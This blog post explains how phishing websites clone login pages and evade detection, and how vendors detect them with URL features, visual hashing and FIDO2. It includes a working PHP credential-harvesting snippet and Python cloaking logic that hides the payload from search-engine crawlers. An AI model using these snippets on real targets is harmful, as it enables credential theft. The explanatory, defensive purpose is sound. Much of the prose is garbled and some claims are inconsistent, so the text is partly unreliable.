James Smith

Posted on Apr 3

How Phishing Websites Trick Users and How to Detect Them

#security #cybersecurity #webdev #scams

An in-depth look at the mechanics of deceit and the algorithms counteracting it.
It was 11:47 PM, and Sarah, a top engineer at a fintech startup, opted to follow a link in what appeared to be a normal Slack notification. The message implied that her token in GitHub had lapsed and that she had to reauthorize. The loaded page resembled the GitHub login screen to the letter; the font was the same, the structure was the same, and the green button was the same. She typed in her details and slept.
In the morning, private stores of her company were cloned, their AWS secrets were stolen, and three production databases were secretly leaking all the data onto an Eastern European server.
The page wasn't on GitHub. It was almost a verbatim copy, erected in less than two hours with a phishing kit that was free to download, uploaded to a hacked WordPress blog, and sent via a weaponized Slack webhook.
This is how phishing today works, and to know why it is effective, one has to dissect not only the psychology of humans that it preys upon but also the inner workings of the technical engine that runs it.

The Structure of a Phishing Page.

Fundamentally, a phishing site must perform two tasks, which are to appear believable and obtain the information before the victim discovers that something is amiss. Contemporary phishing applications deal with them both in frightening detail.
The use of most phishing pages is not created manually anymore but rather cloned. Such tools as HTTrack, wget -mirror, or custom scraping code download the HTML, CSS, JavaScript, and image resources of a legitimate site in a few minutes. The attacker then injects a form handler, which is usually several lines of PHP, that grabs POST data, which is redirected to the actual site. From the user's perspective, the first attempt was a failure, and the next attempt was successful.

The harvester of credentials (PHP)

<?php $data = $_POST; file_put_contents('logs.txt', json_encode($data) . "\n", FILE_APPEND); header('Location: https://real-site.com/login-error'); exit(); ?>

That's twelve lines. That is how thousands of credential harvesting campaigns can be made each month. The engineering that is truly interesting is one layer further down the line, in that phishing operators are finding a way of staying alive long enough to collect valuable data without being detected.

Evasion Stack: The Phishing Sites Remain Unnoticed.

A phishing site that is reported by Google Safe Browsing within an hour cannot be considered valuable. Operators have come up with an advanced evasion stack so as to ensure maximum uptime. Every layer results in a latency of detection, giving the attacker additional harvesting time.

IDN Homoglyph Attacks

The initial defense of attackers is domain cloaking. Attacks on homoglyphs of IDN are also quite cunning: Unicode provides characters of various scripts that are a visual match to Latin characters. Most fonts are pixel-identical in the Cyrillic 'a' (U+0430) to the Latin 'a' (U+0061). So, paypal.com and paypal.com are identical on the face of it but serve different DNS records completely.

PF (Python) Traffic Filtering Gate Logic.

``BLOCKED_RANGES = ["66.249.0.0/16", # Google
"157.55.0.0/16", # Bing
"40.77.0.0/16"] # Microsoft

def should_serve_payload(request):
ip = request.remote_addr
ua = request.headers.get('User-Agent', '')
referrer = request.headers.get('Referer', '')`

if any(ip_in_range(ip, r) for r in BLOCKED_RANGES):

    return False

if 'bot' in ua.lower() or 'crawler' in ua.lower():

    return False

if not referrer:  # Direct access — likely a scanner

    return False

return True`

Detection Side: Algorithms counterattacking.

Browser and email vendors and security companies have detection systems that run on a combination of various signal types concurrently. Contemporary phishing classifiers are either a gradient-boosted tree ensemble (XGBoost or LightGBM) or a fine-tuned transformer model fed on URL and page content features.

Extracting URL-based data (Python)

def extract_url_features(url): parsed = urlparse(url) return { "url_length": len(url), "num_subdomains": parsed.hostname.count('.'), "has_ip_address": bool(re.match(r'\d+\.\d+\.\d+\.\d+', parsed.hostname)), "num_special_chars": sum(url.count(c) for c in ['@','?','-','=','#','%','+']), "domain_entropy": shannon_entropy(parsed.hostname), "brand_in_subdomain": any(b in parsed.hostname.split('.')[:-2] for b in BRAND_LIST), "tld_suspicion_score": TLD_RISK_TABLE.get(parsed.suffix, 0.5), "https_mismatch": parsed.scheme == 'https' and is_self_signed(url), }

The brand in the subdomain check captures the paypal.com.secure-login.xyz pattern, PayPal is present in the domain name, but it is not the registered domain. Domain entropy captures domains that are generated by algorithms (a domain name used to support phishing by a botnet has an unusually large Shannon entropy).

Visual Detection of Similarities.

The signal that is the most computationally costly to detect and least evasive by attackers is visual similarity detection. The method employed by Google and Microsoft comprises perceptual hashing (pHash) and a CNN classifier (using screenshots). The pipeline:

Makes the page with the suspect in a headless browser.
Makes a perceptual hash of the above-the-fold screenshot.
Checks it against a list of hashed valid login pages.
On finding similarity exceeding a threshold, pass to a finer-grained CNN to classify brands.

Where ML Models Are Trained and Where They Fail.

The most common training methodology is based on labeled datasets, such as PhishTank, OpenPhish, and the eCrime dataset of APWG. The pipeline starts with the raw URLs, goes through feature extraction and model training, and then forwards to a live block list.

The most serious vulnerability of this pipeline is time-based: the average phishing site will only have a 4-12-hour lifetime before it enters the Google Safe Browsing blocklist. Zero-day phishing zero-day attacks on domains registered within 24 hours, less than 40% of URL-only classifications can detect them since the domain itself lacks a reputation signal at this time. That is why visual similarity detection and the analysis of the DOM have become the most important complements to a URL-based scoring.

The Human Layer: Technical defenses are not sufficient.

Even with all of this technology perceptual hashing, gradient-boosted classifiers, DOM fingerprints, etc. it cannot reliably prevent a well-timed, highly targeted spear-phish carried out over a trusting channel.
The reason why Sarah succeeded in her attack is that her browser phishing filter did not fail (probably the URL, was not scanned at all, being a newly registered one), but rather the delivery mechanism, the Slack message with a compromised webhook, bypassed any email-based filtering, and Sarah was framed with the urgency message (your token expired), which led her to neglect her verification behavior.

FIDO2: Phishing with Such a Technical Unachievability.

The best technical security measure providers take is FIDO2 hardware keys. Since authentication is tied to the origin domain cryptographically, even an exact copy of a WebAuthn challenge page will not be able to perform a WebAuthn challenge; its key will just refuse to sign a different origin. In the case of organizations, this transforms phishing from a probable attack to a technical impossibility.

The Defense Intersections.

Browser-level real-time visual similarity checks.
DOM analysis with the assistance of LLP that makes reasoning about behavioral intent instead of mere pattern matching.
Reputation propagation networks, which allow organizations to share phishing clues at machine speed.
WebAuthn, and email filters. Flagging the newly registered domains: These implementations can minimize subdomain abuse and phishing.

Closing Thoughts

The arms race between the detection and the phishing systems is actually an information asymmetry issue. Once, an attacker has to deceive a single individual. Defenders are required to intercept all variants, at scale, almost in real-time, in all potential delivery channels.
The military hardware on the military side has never been more advanced, but it is going after an enemy that is iterating on a daily basis and has automated infrastructure that is willing to abandon an entire phishing kit the moment it is raised and spin up a new one in less than an hour.
Learning the mechanics is not merely an academic exercise. It is essential for building resilient systems and informed users. Staying updated through trusted resources like Scam Alerts can provide an additional layer of awareness against rapidly evolving phishing tactics.

DEV Community